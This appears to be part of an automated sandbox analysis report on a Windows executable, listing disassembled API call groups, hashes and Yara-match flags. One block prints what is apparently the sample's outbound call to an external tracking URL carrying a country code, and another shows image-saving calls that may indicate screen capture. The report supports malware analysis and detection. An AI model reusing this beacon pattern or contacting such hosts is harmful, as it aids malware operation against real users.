                                                                                                • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEEF
                                                                                                • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF21
                                                                                                • List.LIBCMT ref: 0041AFA4
                                                                                                • List.LIBCMT ref: 0041AFB3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                • String ID:
                                                                                                • API String ID: 3281396844-0
                                                                                                • Opcode ID: f58ac660b0453a3e9b818a0a9febcd8ba4b28c7f9e8e1f6154efc2f6275add08
                                                                                                • Instruction ID: 8a1b27d7ac99c42c423c038c6da62c4f09041a57878ada6c0d5966c490a343f4
                                                                                                • Opcode Fuzzy Hash: f58ac660b0453a3e9b818a0a9febcd8ba4b28c7f9e8e1f6154efc2f6275add08
                                                                                                • Instruction Fuzzy Hash: 76318B71A02719DFCB10EFA5D5915EEB7B1BF04308F04006FE80167242DB796DA5CB9A
                                                                                                APIs
                                                                                                • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00402060
                                                                                                • GdipAlloc.GDIPLUS(00000010), ref: 00402068
                                                                                                • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 00402083
                                                                                                • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020AD
                                                                                                • GdiplusShutdown.GDIPLUS(?), ref: 004020D9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                                                                • String ID:
                                                                                                • API String ID: 2357751836-0
                                                                                                • Opcode ID: c047b4a56322b1034ae7938cbcb78c43e1d8d2715f6ad981a1214ddf5e978d77
                                                                                                • Instruction ID: 3210944159f0fc98eb109693a3395d5946c9c878d3acb397b58b4dcf5ef0325c
                                                                                                • Opcode Fuzzy Hash: c047b4a56322b1034ae7938cbcb78c43e1d8d2715f6ad981a1214ddf5e978d77
                                                                                                • Instruction Fuzzy Hash: E72171B5A0031AAFCB10DF65DD459AFFBB8FF48741B104036EA02E3290D7759901CBA8
                                                                                                APIs
                                                                                                • std::_Locinfo::_Locinfo.LIBCPMT ref: 02135099
                                                                                                • std::_Locinfo::~_Locinfo.LIBCPMT ref: 021350AD
                                                                                                  • Part of subcall function 0213BDA4: __EH_prolog3_GS.LIBCMT ref: 0213BDAB
                                                                                                • std::_Locinfo::_Locinfo.LIBCPMT ref: 02135112
                                                                                                • __Getcoll.LIBCPMT ref: 02135121
                                                                                                • std::_Locinfo::~_Locinfo.LIBCPMT ref: 02135131
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Locinfostd::_$Locinfo::_Locinfo::~_$GetcollH_prolog3_
                                                                                                • String ID:
                                                                                                • API String ID: 1844465188-0
                                                                                                • Opcode ID: 44aaa5f46009dce830ee941fe4bea5556b318a4865790ba87b622e4823c10ac4
                                                                                                • Instruction ID: dcaeff44ab986d85015b02b5410e0af3d6942124da63144c1994e9a3452d083a
                                                                                                • Opcode Fuzzy Hash: 44aaa5f46009dce830ee941fe4bea5556b318a4865790ba87b622e4823c10ac4
                                                                                                • Instruction Fuzzy Hash: 3E21BB72890308EFDB22EFA0D4447DCBBB3BF54B21F50811AE485AB281DBB48944CF91
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(0213DACD,0213DACD,00000002,0215ED25,02163941,00000000,?,021569F5,00000002,00000000,00000000,00000000,?,0213CF7E,0213DACD,00000004), ref: 021621BA
                                                                                                • _free.LIBCMT ref: 021621EF
                                                                                                • _free.LIBCMT ref: 02162216
                                                                                                • SetLastError.KERNEL32(00000000,?,0213DACD), ref: 02162223
                                                                                                • SetLastError.KERNEL32(00000000,?,0213DACD), ref: 0216222C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free
                                                                                                • String ID:
                                                                                                • API String ID: 3170660625-0
                                                                                                • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                                • Instruction ID: a283a1486bf88f49ace9597a9679934eecb5c7bbade1e5037b46f1d3288e710d
                                                                                                • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                                • Instruction Fuzzy Hash: 440144365C67007FC31627246C8CE3F266EEBC2B72B61012CFC2592290EF718931842A
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,?,0042EABE,00434D6C,?,00431EF8,00000001,00000364,?,0042DFD5,00457910,00000010), ref: 00431F53
                                                                                                • _free.LIBCMT ref: 00431F88
                                                                                                • _free.LIBCMT ref: 00431FAF
                                                                                                • SetLastError.KERNEL32(00000000), ref: 00431FBC
                                                                                                • SetLastError.KERNEL32(00000000), ref: 00431FC5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free
                                                                                                • String ID:
                                                                                                • API String ID: 3170660625-0
                                                                                                • Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                                • Instruction ID: e50af596af166b8a3d4a0e4732677f958598b7c5f443a1734cc3cd8306247ad3
                                                                                                • Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                                • Instruction Fuzzy Hash: F7014936609A003BD3122B315C45D2B266DABD977AF21212FF805933E2EB2C8902512D
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,0215A9DC,?,00000000,?,0215CDD6,02132474,00000000,?,00451F20), ref: 02162135
                                                                                                • _free.LIBCMT ref: 02162168
                                                                                                • _free.LIBCMT ref: 02162190
                                                                                                • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 0216219D
                                                                                                • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021621A9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free
                                                                                                • String ID:
                                                                                                • API String ID: 3170660625-0
                                                                                                • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                • Instruction ID: 4d04cc9d97249cf7c42449d544867d4a31c0c5fbc5a1ddd547d267f215f58a63
                                                                                                • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                • Instruction Fuzzy Hash: 97F0A4365C97107FD2263724AC0CB7F266A9FC2F63F260164FE24922D0EF758536856A
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                • _free.LIBCMT ref: 00431F01
                                                                                                • _free.LIBCMT ref: 00431F29
                                                                                                • SetLastError.KERNEL32(00000000), ref: 00431F36
                                                                                                • SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free
                                                                                                • String ID:
                                                                                                • API String ID: 3170660625-0
                                                                                                • Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                                • Instruction ID: 142cfc1d6fefe371a65853cee7fca9c099a37b51f1b4623e9e727693a4b19c8f
                                                                                                • Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                                • Instruction Fuzzy Hash: 49F02D3A508A0037D61637266C06B1B2A19AFD9B27F31112FF814D33F2EF2DC802452D
                                                                                                APIs
                                                                                                  • Part of subcall function 02142994: TlsGetValue.KERNEL32(?,?,02140DB2,02142EBF,00000000,?,02140D90,?,?,?,00000000,?,00000000), ref: 0214299A
                                                                                                • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 02147BA1
                                                                                                  • Part of subcall function 0215120A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 02151231
                                                                                                  • Part of subcall function 0215120A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0215124A
                                                                                                  • Part of subcall function 0215120A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 021512C0
                                                                                                  • Part of subcall function 0215120A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 021512C8
                                                                                                • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 02147BAF
                                                                                                • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 02147BB9
                                                                                                • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 02147BC3
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02147BE1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                • String ID:
                                                                                                • API String ID: 4266703842-0
                                                                                                • Opcode ID: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                                                                • Instruction ID: 80b7bb8c58435c6d154dba37b28106e56a4f83ae9355d28c7f1cf118ba4281b0
                                                                                                • Opcode Fuzzy Hash: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                                                                • Instruction Fuzzy Hash: 94F02B31A406286FCF25B775D81096EF727DF80B15B00416AD81953290DF35DA468FC1
                                                                                                APIs
                                                                                                  • Part of subcall function 0041272D: TlsGetValue.KERNEL32(?,?,00410B4B,00412C58,00000000,?,00410B29,?,?,?,00000000,?,00000000), ref: 00412733
                                                                                                • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041793A
                                                                                                  • Part of subcall function 00420FA3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FCA
                                                                                                  • Part of subcall function 00420FA3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FE3
                                                                                                  • Part of subcall function 00420FA3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421059
                                                                                                  • Part of subcall function 00420FA3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421061
                                                                                                • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417948
                                                                                                • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417952
                                                                                                • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041795C
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0041797A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                • String ID:
                                                                                                • API String ID: 4266703842-0
                                                                                                • Opcode ID: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                                                                • Instruction ID: 571f4fa900913ae9ac1b624b88cebae7c96a5b4968f9dadd54c27da6e91ea8e9
                                                                                                • Opcode Fuzzy Hash: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                                                                • Instruction Fuzzy Hash: B7F0F671A0421467CA15B737A8529EEB7669F90764B40012FF41193292DFAC9E9886CD
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 0216A0B4
                                                                                                  • Part of subcall function 021636C1: HeapFree.KERNEL32(00000000,00000000,?,0216A34F,?,00000000,?,00000000,?,0216A5F3,?,00000007,?,?,0216A9E7,?), ref: 021636D7
                                                                                                  • Part of subcall function 021636C1: GetLastError.KERNEL32(?,?,0216A34F,?,00000000,?,00000000,?,0216A5F3,?,00000007,?,?,0216A9E7,?,?), ref: 021636E9
                                                                                                • _free.LIBCMT ref: 0216A0C6
                                                                                                • _free.LIBCMT ref: 0216A0D8
                                                                                                • _free.LIBCMT ref: 0216A0EA
                                                                                                • _free.LIBCMT ref: 0216A0FC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                • Instruction ID: 06b75c71840b6c4fd7b594b158bf1da39413d76828fba74081808b6852b77980
                                                                                                • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                • Instruction Fuzzy Hash: ACF03632985300AB8720EB58F9CAC3E77DAAE047157640995F459E7721CF31FCB08A99
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00439E4D
                                                                                                  • Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
                                                                                                  • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
                                                                                                • _free.LIBCMT ref: 00439E5F
                                                                                                • _free.LIBCMT ref: 00439E71
                                                                                                • _free.LIBCMT ref: 00439E83
                                                                                                • _free.LIBCMT ref: 00439E95
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                • Instruction ID: d2eb3a6f69ed6479eb379d103aeec45d7d0be428363b37fe18b93f123c88dda9
                                                                                                • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                • Instruction Fuzzy Hash: E2F04F32905300A7A621EF59E487C1773D9BB08712F68694BF00CD7751CB79FC808A5D
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 0216199F
                                                                                                  • Part of subcall function 021636C1: HeapFree.KERNEL32(00000000,00000000,?,0216A34F,?,00000000,?,00000000,?,0216A5F3,?,00000007,?,?,0216A9E7,?), ref: 021636D7
                                                                                                  • Part of subcall function 021636C1: GetLastError.KERNEL32(?,?,0216A34F,?,00000000,?,00000000,?,0216A5F3,?,00000007,?,?,0216A9E7,?,?), ref: 021636E9
                                                                                                • _free.LIBCMT ref: 021619B1
                                                                                                • _free.LIBCMT ref: 021619C4
                                                                                                • _free.LIBCMT ref: 021619D5
                                                                                                • _free.LIBCMT ref: 021619E6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                • Instruction ID: 74fbd127e493c51fea061b187b098088000905126a042e73b4c34c19ff70b008
                                                                                                • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                • Instruction Fuzzy Hash: 7DF0D071C40310AF9F216F14BC844187B61AF19B2271112A6F41697372C735D976DFDE
                                                                                                APIs
                                                                                                • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0214CF26
                                                                                                • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0214CF57
                                                                                                • GetCurrentThread.KERNEL32 ref: 0214CF60
                                                                                                • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0214CF73
                                                                                                • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0214CF7C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                                • String ID:
                                                                                                • API String ID: 2583373041-0
                                                                                                • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                • Instruction ID: ad8f68c45ba6aacc2223790b7c7b52c7b83c724db88273b713f6bc56cba147b8
                                                                                                • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                • Instruction Fuzzy Hash: C7F0A0362806009FCA29EF60F9508BB73B6AFC46103104A6EE49F06660CF35E907DB62
                                                                                                APIs
                                                                                                • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCBF
                                                                                                • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CCF0
                                                                                                • GetCurrentThread.KERNEL32 ref: 0041CCF9
                                                                                                • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD0C
                                                                                                • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD15
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                                • String ID:
                                                                                                • API String ID: 2583373041-0
                                                                                                • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                • Instruction ID: c05db364d3e23aa36edd3e4f9db1c19a47e3778ae9c6089a54b2af47d917b565
                                                                                                • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                • Instruction Fuzzy Hash: 0EF0A776240500AB8625FF22F9518F77776EFC4715310091EE44B07651DF29ADC2DB6A
                                                                                                APIs
                                                                                                • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02132E84
                                                                                                  • Part of subcall function 02131321: _wcslen.LIBCMT ref: 02131328
                                                                                                  • Part of subcall function 02131321: _wcslen.LIBCMT ref: 02131344
                                                                                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 02133097
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InternetOpen_wcslen
                                                                                                • String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
                                                                                                • API String ID: 3381584094-4083784958
                                                                                                • Opcode ID: 8338334aa55b55d19b97b2d3d130d29e6172645a3c0eef54179fbcd96b31667d
                                                                                                • Instruction ID: 74a626e0ddaf7e2cc6f344f4dc184f0e5fac850af774db664615f3ccfa333479
                                                                                                • Opcode Fuzzy Hash: 8338334aa55b55d19b97b2d3d130d29e6172645a3c0eef54179fbcd96b31667d
                                                                                                • Instruction Fuzzy Hash: 4F516095E65344A9E320EBB0BC41B2633B8FF58712F10547AE528CB2B2E7B1D944875E
                                                                                                APIs
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00434464
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00434479
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                • String ID: BC$BC
                                                                                                • API String ID: 885266447-2490606219
                                                                                                • Opcode ID: e00c22cf9212fddccde6eda0d4f11a2eb8b15fda35716567c4cef15c7bcc9cff
                                                                                                • Instruction ID: b88449fc46bca28f45784ded13f8a3cce66366d25dc88dae471b8c9c35daa9d8
                                                                                                • Opcode Fuzzy Hash: e00c22cf9212fddccde6eda0d4f11a2eb8b15fda35716567c4cef15c7bcc9cff
                                                                                                • Instruction Fuzzy Hash: 61518F71A00208AFCB14DF59C884AAEBBB2EFD8314F19C26AE81897361D775ED51CB44
                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Mmm7GmDcR4.exe,00000104), ref: 0215F9AA
                                                                                                • _free.LIBCMT ref: 0215FA75
                                                                                                • _free.LIBCMT ref: 0215FA7F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$FileModuleName
                                                                                                • String ID: C:\Users\user\Desktop\Mmm7GmDcR4.exe
                                                                                                • API String ID: 2506810119-2372408114
                                                                                                • Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                • Instruction ID: 566b6f95da49e4a57a33f7e64198dd646038f585bf83239fe0d8e25c9a2bc22e
                                                                                                • Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                • Instruction Fuzzy Hash: 16318171A80268EFDB21DF99DC84D9EBBBDEF8A710B1040A6FC2597221D7709A41CB51
                                                                                                APIs
                                                                                                • SetLastError.KERNEL32(0000000D,?,0040DE37,0040C64F,?,?,00000000,?,0040C51F,0045D5E4,0040C4EC,0045D5DC,?,ios_base::failbit set,0040C64F), ref: 0040EFA0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast
                                                                                                • String ID: <(@$y+
                                                                                                • API String ID: 1452528299-728444040
                                                                                                • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                • Instruction ID: 966c5171ab2b841c9a1c941c3673e83940a55d69d5d5609413e6151fa891d796
                                                                                                • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                • Instruction Fuzzy Hash: 9711C236200216BFCF129F61DC4496ABB65BB08715B11443AFA46E6290CB70DC219BD5
                                                                                                APIs
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0213C8D4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw
                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                • API String ID: 2005118841-1866435925
                                                                                                • Opcode ID: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                                                                • Instruction ID: 8f464fd1b48dc8b0617c6ccf2ca13d24d8d76f45430a4caabb7517d5a3a2d904
                                                                                                • Opcode Fuzzy Hash: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                                                                • Instruction Fuzzy Hash: 19F02BB3C806086ECB05E958CC01FEA73995B11305F0480B7DE527A182EB689A05CBD4
                                                                                                APIs
                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,00431F4D), ref: 0042DF89
                                                                                                • GetLastError.KERNEL32(00457910,00000010,00000003,00431F4D), ref: 0042DFC3
                                                                                                • ExitThread.KERNEL32 ref: 0042DFCA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                • String ID: <(@
                                                                                                • API String ID: 3213686812-4189137628
                                                                                                • Opcode ID: 66e0b01c820f3c016cb479e2b3e6a53e6d0229a994ecfa947a89fafbf06fb01a
                                                                                                • Instruction ID: c42ad4fc6a3a459dd0b6f73910b388841d309234efd3d08c580d18ad64b54486
                                                                                                • Opcode Fuzzy Hash: 66e0b01c820f3c016cb479e2b3e6a53e6d0229a994ecfa947a89fafbf06fb01a
                                                                                                • Instruction Fuzzy Hash: CCF02761B8432635FA2037B27D0BBAB19150F14B0DF96003FFF0A995C3DEAC955040AD
                                                                                                APIs
                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,00431F4D), ref: 0042DF89
